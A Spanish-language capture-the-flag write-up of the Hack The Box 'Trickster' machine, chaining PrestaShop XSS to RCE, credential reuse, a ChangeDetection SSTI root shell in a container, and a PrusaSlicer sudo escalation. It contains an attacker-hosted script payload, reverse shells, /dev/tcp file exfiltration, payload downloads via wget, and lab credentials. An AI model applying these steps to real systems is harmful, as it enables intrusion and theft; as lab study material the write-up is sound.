Entrada

HTB - Trickster | (Difficulty Medium) - Linux

Writeup de la máquina de dificultad media Trickster de la página https://hackthebox.eu

HTB - Trickster | (Difficulty Medium) - Linux

Useful Skills

  • Web enumeration
  • Extracting the contents of .git directory (git-dumper)
  • Abusing PrestaShop 8.1.5 XSS to RCE (CVE-2024-34716)
  • Lateral Movement to james via Information lekeage (parameters.php)
  • Cracking hashes (hashcat)
  • Internal Host Discovery Docker Container
  • Internal Port Discovery Docker Container
  • SSH Local Port Forwarding
  • Abusing ChangeDetection 0.45.20 STTI to RCE (CVE-2024-32651)
  • Lateral Movement to adam via Information Lekeage (Brotli file)
  • Abusing sudo privileges in PrusaSlicer 2.6.1 RCE (CVE-2023-47268 )

Enumeration

TCP Scan

1
2
rustscan -a 10.10.11.34 --ulimit 5000 -g
10.10.11.34 -> [22,80]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nmap -p22,80 -sCV 10.10.11.34 -oN tcpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 20:15 CET
Nmap scan report for 10.10.11.34
Host is up (0.035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds

UDP Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sU --top-ports 1500 --min-rate 5000 -n -Pn 10.10.11.34 -oN udpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 20:16 CET
Nmap scan report for 10.10.11.34
Host is up (0.037s latency).
Not shown: 1494 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
772/udp   closed cycleserv2
8010/udp  closed unknown
22862/udp closed unknown
23322/udp closed unknown
26026/udp closed unknown
41967/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds

Hay que añadir el dominio trickster.htb en el archivo de configuración /etc/hosts para que se pueda resolver el nombre de dominio a la dirección IP 10.10.11.34

HTTP Enumeration

Whatweb reporta un servidor Apache 2.4.52, y un código de estado 403-Forbidden

1
2
whatweb http://trickster.htb
http://trickster.htb [403 Forbidden] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.10.11.34], Title[403 Forbidden]

Accediendo a la página en http://trickster.htb/ puedo observar una página web dedicada al comercio minorista online

imagen

Al intentar acceder a shop obtengo un mensaje el cual indica que no se puede conectar a http://shop.trickster.htb

imagen

Hay que añadir el subdominio shop.trickster.htb en el archivo de configuración /etc/hosts para que se pueda resolver el nombre de dominio a la dirección IP 10.10.11.34

Utilizo gobuster para realizar una enumeración exhaustiva de directorios

1
gobuster dir -u http://trickster.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -b 403,404 -q
1
2
3
4
5
6
gobuster dir -u http://shop.trickster.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -b 403,404 -q
/.git/config          (Status: 200) [Size: 112]
/.git                 (Status: 301) [Size: 323] [--> http://shop.trickster.htb/.git/]
/.git/HEAD            (Status: 200) [Size: 28]
/.git/logs/           (Status: 200) [Size: 1137]
/.git/index           (Status: 200) [Size: 252177]

Utilizo la herramienta git-dumper para dumpear todo el repositorio git del sitio web

1
python3 git_dumper.py http://shop.trickster.htb/.git/ .

Observo los logs del repositorio git con el comando git log, no consigo observar nada interesante, simplemente una actualización del panel de administración, también consigo observar un dirección email la cual es adam@trickster.htb

1
2
3
4
5
6
git log

commit 0cbc7831c1104f1fb0948ba46f75f1666e18e64c (HEAD -> admin_panel)
Author: adam <adam@trickster.htb>
Date:   Fri May 24 04:13:19 2024 -0400
update admin pannel
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
git show 0cbc7831c1104f1fb0948ba46f75f1666e18e64c

diff --git a/.php-cs-fixer.dist.php b/.php-cs-fixer.dist.php
new file mode 100644
index 0000000..4f6c2eb
--- /dev/null
+++ b/.php-cs-fixer.dist.php
@@ -0,0 +1,52 @@
+<?php
+
+ini_set('memory_limit','256M');
+
+$finder = PhpCsFixer\Finder::create()->in([
+    __DIR__.'/src',
+    __DIR__.'/classes',
+    __DIR__.'/controllers',
+    __DIR__.'/tests',
+    __DIR__.'/tools/profiling',
+])->notPath([
+    'Unit/Resources/config/params.php',
+    'Unit/Resources/config/params_modified.php',
+]);
+
+return (new PhpCsFixer\Config())
+    ->setRiskyAllowed(true)
+    ->setRules([
+        '@Symfony' => true,
+        'array_indentation' => true,
+        'cast_spaces' => [
+            'space' => 'single',
+        ],
+        'combine_consecutive_issets' => true,
+        'concat_space' => [
+            'spacing' => 'one',
+        ],
+        'error_suppression' => [
+            'mute_deprecation_error' => false,
+            'noise_remaining_usages' => false,
+            'noise_remaining_usages_exclude' => [],
+        ],
+        'function_to_constant' => false,
+        'method_chaining_indentation' => true,
+        'no_alias_functions' => false,
+        'no_superfluous_phpdoc_tags' => false,
+        'non_printable_character' => [
+            'use_escape_sequences_in_strings' => true,
+        ],
+        'phpdoc_align' => [
+            'align' => 'left',
+        ],
+        'phpdoc_summary' => false,
+        'protected_to_private' => false,
+        'psr_autoloading' => false,
+        'self_accessor' => false,
+        'yoda_style' => false,
+        'single_line_throw' => false,
+        'no_alias_language_construct_call' => false,
+    ])
+    ->setFinder($finder)
+    ->setCacheFile(__DIR__.'/var/.php_cs.cache');

Al hacer ls para observar los directorios y archivos que existen, veo un directorio que me llama la atención, el cual es admin634ewutrx1jgitlooaj

1
2
ls
admin634ewutrx1jgitlooaj  autoload.php  error500.html  git-dumper  index.php  init.php  Install_PrestaShop.html  INSTALL.txt  LICENSES  Makefile

Me dirijo a http://shop.trickster.htb/admin634ewutrx1jgitlooaj/ para observar si existe el directorio, para mi sorpresa me encuentro con un panel de administración de login de PrestaShop, donde consigo ver la versión de PrestaShop, la cual es 8.1.5

imagen

Sabiendo que es PrestaShop y que la versión es 8.1.5 puedo buscar información sobre posibles vulnerabilidades existentes

Vulnerability analysis

CVE-2024-34716 (PrestaShop 8.1.5 XSS to RCE)

Una pequeña búsqueda en internet me permite dar con la vulnerabilidad CVE-2024-34716, se trata de un XSS que deriva en una Ejecución Remota de comandos.

Exploitation

Encuentro un exploit asociado a un artículo sobre la vulnerabilidad CVE-2024-34716 el cual me sirve para entender como funciona todo.

imagen

imagen

El árticulo indica que en /contact-us/ existe un campo el cual permite adjuntar un archivo, donde es posible introducir un .png con codigo JS el cual será interpretado cuando un administrador reciba la notificación. Me dirigo a http://shop.trickster.htb/contact-us/

imagen

Creo un archivo test.png con el siguiente codigo JS, el cual si es verdad que es interpretado deberé de recibir una solicitud HTTP al servidor Python

1
<script src="http://10.10.14.197:8000/exploit.js"></script>

Levanto un servidor en Python y relleno el formulario de contacto adjuntando el archivo .png malicioso

1
2
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

imagen

imagen

Compruebo que es cierto que el codigo JS es interpretado, ya que recibo una solicitud GET intentando cargar el recurso exploit.js

1
2
3
4
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.34 - - [02/Feb/2025 11:30:44] code 404, message File not found
10.10.11.34 - - [02/Feb/2025 11:30:44] "GET /exploit.js HTTP/1.1" 404 -

Para automatizar el proceso de subida del archivo malicioso y la extracción del token utilizaré ejecutare el exploit en Python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
python3 exploit.py --url http://shop.trickster.htb --local-ip 10.10.14.197 --email adam@trickster.htb --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
	Url: http://shop.trickster.htb
	Email: adam@trickster.htb
	Local IP: 10.10.14.197
	Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
listening on [any] 12345 ...
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [02/Feb/2025 11:36:10] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
connect to [10.10.14.197] from (UNKNOWN) [10.10.11.34] 51386
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 10:36:19 up 15:34,  0 users,  load average: 0.49, 0.23, 0.33
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

El exploit utiliza ncat para entablar la reverse shell, por lo que para utilizar netcat hay que modificar el codigo de Python

Post exploitation

User Pivoting

Obtengo acceso al sistema como el usuario www-data, este es un usuario con bajo privilegios por lo que debo de buscar alguna manera de pivotar hacia otro usuario. Comenzaré visualizando cuales son los usuarios que existen en el sistema.

1
2
3
4
5
www-data@trickster:/$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
james:x:1000:1000:trickster:/home/james:/bin/bash
adam:x:1002:1002::/home/adam:/bin/bash
runner:x:1003:1003::/home/runner:/bin/sh

Como es habitual comienzo intentando buscar archivos de configuración que puedan contener credenciales de acceso a una base de datos o como usuario del sistema. Realizo una búsqueda en internet para saber donde se encuentra el archivo de configuración de la base de datos de PrestaShop, encuentro un artículo que indica que en /you-website/app/config/parameters.php se encuentra el archivo

Supongo que el sitio web de PrestaShop se encuentra alojado en /var/www por lo que visualizo el archivo de configuración de la base de datos en /var/www/prestashop/app/config/parameters.php

1
www-data@trickster:/$ cat /var/www/prestashop/app/config/parameters.php

Consigo ver unas credenciales de acceso al base de datos del sistema

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php return array (
  'parameters' => 
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'ps_user',
    'database_password' => 'prest@shop_o',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2024-05-25',
    'locale' => 'en-US',
    'use_debug_toolbar' => true,
    'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
    'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
    'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
    'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY----

Accedo a la base de datos con el usuario ps_user y la contraseña prest@shop_o

1
2
3
4
5
6
7
8
9
10
www-data@trickster:/$ mysql -h 127.0.0.1 -ups_user -pprest@shop_o
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 21970
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

Visualizo las bases de datos existentes y solo observo una, la cual es prestashop, por lo que acceso a la misma

1
2
3
4
5
6
7
8
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| prestashop         |
+--------------------+
2 rows in set (0.001 sec)
1
2
3
4
5
MariaDB [(none)]> use prestashop;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

Visualizando tables, observo que la tabla ps_employee contiene contraseñas

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
MariaDB [prestashop]> describe ps_employee;
+--------------------------+---------------------+------+-----+---------------------+----------------+
| Field                    | Type                | Null | Key | Default             | Extra          |
+--------------------------+---------------------+------+-----+---------------------+----------------+
| id_employee              | int(10) unsigned    | NO   | PRI | NULL                | auto_increment |
| id_profile               | int(10) unsigned    | NO   | MUL | NULL                |                |
| id_lang                  | int(10) unsigned    | NO   |     | 0                   |                |
| lastname                 | varchar(255)        | NO   |     | NULL                |                |
| firstname                | varchar(255)        | NO   |     | NULL                |                |
| email                    | varchar(255)        | NO   | MUL | NULL                |                |
| passwd                   | varchar(255)        | NO   |     | NULL                |                |
| last_passwd_gen          | timestamp           | NO   |     | current_timestamp() |                |
| stats_date_from          | date                | YES  |     | NULL                |                |
| stats_date_to            | date                | YES  |     | NULL                |                |
| stats_compare_from       | date                | YES  |     | NULL                |                |
| stats_compare_to         | date                | YES  |     | NULL                |                |
| stats_compare_option     | int(1) unsigned     | NO   |     | 1                   |                |
| preselect_date_range     | varchar(32)         | YES  |     | NULL                |                |
| bo_color                 | varchar(32)         | YES  |     | NULL                |                |
| bo_theme                 | varchar(32)         | YES  |     | NULL                |                |
| bo_css                   | varchar(64)         | YES  |     | NULL                |                |
| default_tab              | int(10) unsigned    | NO   |     | 0                   |                |
| bo_width                 | int(10) unsigned    | NO   |     | 0                   |                |
| bo_menu                  | tinyint(1)          | NO   |     | 1                   |                |
| active                   | tinyint(1) unsigned | NO   |     | 0                   |                |
| optin                    | tinyint(1) unsigned | YES  |     | NULL                |                |
| id_last_order            | int(10) unsigned    | NO   |     | 0                   |                |
| id_last_customer_message | int(10) unsigned    | NO   |     | 0                   |                |
| id_last_customer         | int(10) unsigned    | NO   |     | 0                   |                |
| last_connection_date     | date                | YES  |     | NULL                |                |
| reset_password_token     | varchar(40)         | YES  |     | NULL                |                |
| reset_password_validity  | datetime            | YES  |     | NULL                |                |
| has_enabled_gravatar     | tinyint(3) unsigned | NO   |     | 0                   |                |
+--------------------------+---------------------+------+-----+---------------------+----------------+
29 rows in set (0.002 sec)

Por lo que realizo una consulta para recuperar el email y la contraseña de la tabla ps_employee

1
2
3
4
5
6
7
8
MariaDB [prestashop]> select email,passwd from ps_employee;
+---------------------+--------------------------------------------------------------+
| email               | passwd                                                       |
+---------------------+--------------------------------------------------------------+
| admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+---------------------+--------------------------------------------------------------+
2 rows in set (0.000 sec)

A simple visto observar que el formato de los hashes es bcrypt, utilizo John The Ripper y tras un rato de espera consigo crackear el hash del usuario james, usuario existente en el sistema.

1
john hashes --wordlist=/usr/share/wordlists/rockyou.txt
1
2
john --show hashes
?:alwaysandforever

Intento acceder por ssh como el usuario james, consigo exitosamente acceder.

1
2
3
4
5
6
7
8
9
10
ssh james@trickster.htb
The authenticity of host 'trickster.htb (10.10.11.34)' can't be established.
ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'trickster.htb' (ED25519) to the list of known hosts.
james@trickster.htb's password: 
Last login: Sun Feb  2 09:27:33 2025 from 10.10.14.95
james@trickster:~$ whoami
james

Accedo como el usuario james, listando las direcciones IP asignadas a las interfaces de red del sistema, veo que hay una diferente a la de la máquina, la cual es 172.17.0.1

1
2
james@trickster:~$ hostname -I
10.10.11.34 172.17.0.1
1
2
3
4
5
james@trickster:~$ ip addr show docker0
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:95:4a:41:58 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever

Para detectar si existen contenedores desplegados en el sistema ya que no soy root utilizare un pequeño one-liner en bash para detectar los host activos.

1
2
3
james@trickster:/tmp$ for i in $(seq 1 254);do timeout 1 bash -c "ping -c 1 172.17.0.$i &>/dev/null && echo 'Host: 172.17.0.$i - ACTIVE'";done
Host: 172.17.0.1 - ACTIVE
Host: 172.17.0.2 - ACTIVE

Veo que existe otro host activo a parte de 172.17.0.1 que es 172.17.0.2, por lo que para dichos host utilizaré otro one-liner en bash para detectar puertos abiertos en ambos hosts.

1
2
3
james@trickster:/tmp$ for port in $(seq 1 65535);do nc -nvz 172.17.0.1 $port 2>&1 | grep -v refused;done
Connection to 172.17.0.1 22 port [tcp/*] succeeded!
Connection to 172.17.0.1 80 port [tcp/*] succeeded!
1
2
james@trickster:/tmp$ for port in $(seq 1 65535);do nc -nvz 172.17.0.2 $port 2>&1 | grep -v refused;done
Connection to 172.17.0.2 5000 port [tcp/*] succeeded!

El puerto 5000 del host 172.17.0.2 llama mi atención, realizo un curl para detectar si se trata de un servicio web, pudiendo observar que es así y que se esta redirigiendo a lo que es un panel de login.

1
2
3
4
5
6
james@trickster:/tmp$ curl -s -X GET http://172.17.0.2:5000
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.

Utilizo ssh para realizar un Local Port Forwarding y traer el puerto 5000 del contenedor al puerto 5000 de mi máquina local.

1
2
ssh -L 5000:172.17.0.2:5000 james@trickster.htb -fN
james@trickster.htb's password:

Me dirijo a http://127.0.0.1:5000 pudiendo observar un login de un servicio llamado ChangeDetection.io, ademas en la parte superior derecha consigo observar la versión, la cual es 0.45.20

imagen

Sabiendo que es ChangeDetection y que la versión es 0.45.20 puedo buscar información sobre posibles vulnerabilidades existentes

Una pequeña búsqueda en internet me permite dar con que existe un STTI que deriva en una Ejecución remota de comandos.

imagen

Necesito estar logueado por lo que busco credenciales por defecto del servicio, pero no encuentro, por ello intento acceder con la contraseña de james, para así comprobar si se realiza reutilización de contraseñas, consigo observar que si accediendo satisfactoriamente al panel de ChangeDetection.

imagen

imagen

Basicamente en el exploit se indica que el primer paso es crear o editar una URL existente

imagen

Una vez creada hacer clic en editar sobre la misma

imagen

En la primera pestaña modificar a nuestro gusto cada cuanto tiempo se va a comprobar si se han producido cambios en el recurso hacia el que se está apuntando, establezco cada 10 segundos.

imagen

Ahora me dirijo a la pestaña Notifications y es allí donde debo de indicar en el Notification Body la inyección, por otro lado en notification URL list indicar que quiero recibir la notificación a mi ip port el puerto 1234

imagen

Creo un archivo index.html con contenido y levanto un servidor en Python

1
2
cat index.html
satfdxdygcfuhij
1
2
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Utilizo netcat para pornerme en escucha por el puerto 1234, por donde se me va a notificar en caso de que se produzca algun cambio en el archivo index.html

1
2
nc -lvnp 1234
listening on [any] 1234 ...

Modifico el fichero index.html y al pasar 10 segundos recibo la notificación y al final en el body consigo observar la ejecución del comando id, pudiendo ver que soy root en el contenedor.

1
2
cat index.html
dastgfhyujkijhrtgewfwdqtghyjugcfuhij
1
2
3
4
5
6
7
8
9
10
11
12
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.11.34] 53758
GET / HTTP/1.1
Host: 10.10.14.197:1234
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 38

uid=0(root) gid=0(root) groups=0(root

Sabiendo esto realizo el mismo, proceso pero en este caso para entablarme una reverse shell port el puerto 1234

imagen

Inicio un listener con netcat por el puerto 1234, y así obtener la reverse shell

1
2
nc -lvnp 1234
listening on [any] 1234 ...

Modifico el index.html

1
2
cat index.html
ewdrstfghjj

Tras recibir la solicitud consigo obtener acceso al contenedor como root

1
2
3
4
5
6
7
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.11.34] 48234
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@a4b9a36ae7ff:/app# whoami
root

Utilizo find para filtrar por archivo de configuración, pero no consigo observar nada de mi interés

1
2
3
4
5
6
7
8
9
root@a4b9a36ae7ff:/app# find / -name \*conf\* | grep -vE "etc|sys|usr|var"
/proc/bootconfig
/app/changedetectionio/static/favicons/browserconfig.xml
/app/changedetectionio/tests/visualselector/conftest.py
/app/changedetectionio/tests/conftest.py
/app/changedetectionio/tests/restock/conftest.py
/app/changedetectionio/tests/proxy_list/conftest.py
/app/changedetectionio/tests/proxy_list/squid-auth.conf
/app/changedetectionio/tests/proxy_list/squid.conf

Me dirigio al directorio raíz y observo un directorio el cual no es común ver, llamado datastore

1
2
root@a4b9a36ae7ff:/# ls
app  bin  boot	datastore  dev	etc  home  lib	lib64  media  mnt  opt	proc  root  run  sbin  srv sys  tmp  usr  var

Dentro del directorio datastore observo un directorio Backups que es lo que principalmente llama mi atención

1
2
3
root@a4b9a36ae7ff:/datastore# ls
Backups b86f1003-3ecb-4125-b090-27e15ca605b9  secret.txt
url-list.txt a1f2b7b9-bf49-485d-ae61-27a0ebdb5234 bbdd78f6-db98-45eb-9e7b-681a0c60ea34  url-list-with-tags.txt url-watches.json

En el directorio Backups observo dos archivos .zip, los cuales traiga a mi máquina local

1
2
root@a4b9a36ae7ff:/datastore/Backups# ls
changedetection-backup-20240830194841.zip  changedetection-backup-20240830202524.zip
1
2
nc -lvnp 1234 > changedetection-backup-20240830194841.zip
listening on [any] 1234 ...
1
root@a4b9a36ae7ff:/datastore/Backups# cat < changedetection-backup-20240830194841.zip > /dev/tcp/10.10.14.197/1234
1
2
nc -lvnp 1234 > changedetection-backup-20240830202524.zip
listening on [any] 1234 ...
1
root@a4b9a36ae7ff:/datastore/Backups# cat < changedetection-backup-20240830202524.zip > /dev/tcp/10.10.14.197/1234

Descomprimo ambos .zip, en la carpeta llamada b4a8b52d-651b-44bc-bbc6-f9e8c6590103 observo un archivo .txt.br el cual si intento visualizar es ilegible, buscando información observo que un archivo con la extensión .br es un archivo comprimido con el formato Brotli, un algoritmo de compresión desarrollado por Google, Brotli es ampliamente utilizado para comprimir archivos web, como HTML, CSS y JavaScript, para reducir el tamaño de transferencia y mejorar la velocidad de carga. Por lo que con la herramienta brotli en Linux se puede descomprimir el contenido.

1
brotli -d f04f0732f120c0cc84a993ad99decb2c.txt.br

Al visualizar f04f0732f120c0cc84a993ad99decb2c.txt observo credenciales de acceso a la base de datos de un usuario del sistema, el cual es adam.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
cat f04f0732f120c0cc84a993ad99decb2c.txt
  This website requires JavaScript.
    Explore Help
    Register Sign In
                james/prestashop
              Watch 1
              Star 0
              Fork 0
                You've already forked prestashop
          Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
                main
          prestashop / app / config / parameters.php
            james 8ee5eaf0bb prestashop
            2024-08-30 20:35:25 +01:00

              64 lines
              3.1 KiB
              PHP

            Raw Permalink Blame History

                < ? php return array (                                                                                                                                 
                'parameters' =>                                                                                                                                        
                array (                                                                                                                                                
                'database_host' => '127.0.0.1' ,                                                                                                                       
                'database_port' => '' ,                                                                                                                                
                'database_name' => 'prestashop' ,                                                                                                                      
                'database_user' => 'adam' ,                                                                                                                            
                'database_password' => 'adam_admin992' ,                                                                                                               
                'database_prefix' => 'ps_' ,                                                                                                                           
                'database_engine' => 'InnoDB' ,                                                                                                                        
                'mailer_transport' => 'smtp' ,                                                                                                                         
                'mailer_host' => '127.0.0.1' ,                                                                                                                         
                'mailer_user' => NULL ,                                                                                                                                
                'mailer_password' => NULL ,                                                                                                                            
                'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog' ,                                                                       
                'ps_caching' => 'CacheMemcache' ,                                                                                                                      
                'ps_cache_enable' => false ,                                                                                                                           
                'ps_creation_date' => '2024-05-25' ,                                                                                                                   
                'locale' => 'en-US' ,                                                                                                                                  
                'use_debug_toolbar' => true ,                                                                                                                          
                'cookie_key' => '8PR6s1SCD3cLk5GpvkGAZ4K9hMXpx2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i' ,                                                                  
                'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g' ,                                                                                                    
                'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03fbb7f2fb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47' ,
                'api_public_key' => '-----BEGIN PUBLIC KEY-----                                                                                                        
                MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr                                                                                       
                v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG                                                                                       
                5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt                                                                                       
                Scu6QqRAdotokqW2meozijOIJFPFPkpoFKPdVdJ8oslvSt6Kgf39DnBpGIXAqaFc                                                                                       
                QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm                                                                                       
                B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1                                                                                       
                ZQIDAQAB                                                                                                                                               
                -----END PUBLIC KEY----- 

Intento acceder mediante ssh con las credenciales, consiguiendo ganar acceso como el usuario adam al sistema.

1
2
3
4
ssh adam@10.10.11.34
adam@10.10.11.34's password: 
adam@trickster:~$ whoami
adam

Privilege escalation

Utilizo el comando sudo -l para visualizar los binarios que puede ejecutar con privilegios elevados, observo que tengo permiso para ejecutar prusaslicer sin necesidad de proporcionar contraseña.

1
2
3
4
5
6
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

Buscando información observo que PrusaSlicer es un software de código abierto para preparar modelos 3D para impresión en impresoras 3D de tipo FDM y SLA. Ejecuto prusaslicer –version y obtengo un error que me indica que no se conoce el comando pero aun así consigo ver la versión, la cual es 2.6.1

1
2
3
4
adam@trickster:~$ sudo /opt/PrusaSlicer/prusaslicer --version
Unknown option --version
PrusaSlicer-2.6.1+linux-x64-GTK2-202309060801 based on Slic3r (with GUI support)
https://github.com/prusa3d/PrusaSlicer

Sabiendo que es PrusaSlicer y que la versión es 2.6.1 puedo buscar información sobre posibles vulnerabilidades existentes

Una pequeña búsqueda me permite dar con un repositorio de Github dond se explican a la perfección los pasos a seguir para explotar la ejecución remota de comandos.

El primer paso es clonar el repositorio en la máquina de atacante

1
git clone https://github.com/suce0155/prusaslicer_exploit

El siguiente paso es montar un servidor en Python3 y transferir los archivos exploit.sh y evil.3mf

1
2
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
1
2
3
4
5
6
adam@trickster:/tmp$ wget http://10.10.14.197:8000/exploit.sh
--2025-02-02 22:44:29--  http://10.10.14.197:8000/exploit.sh
Connecting to 10.10.14.197:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 42 [text/x-sh]
Saving to: ‘exploit.sh’
1
2
3
4
5
6
adam@trickster:/tmp$ wget http://10.10.14.197:8000/evil.3mf
--2025-02-02 22:44:16--  http://10.10.14.197:8000/evil.3mf
Connecting to 10.10.14.197:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39455 (39K) [application/vnd.ms-3mfdocument]
Saving to: ‘evil.3mf’

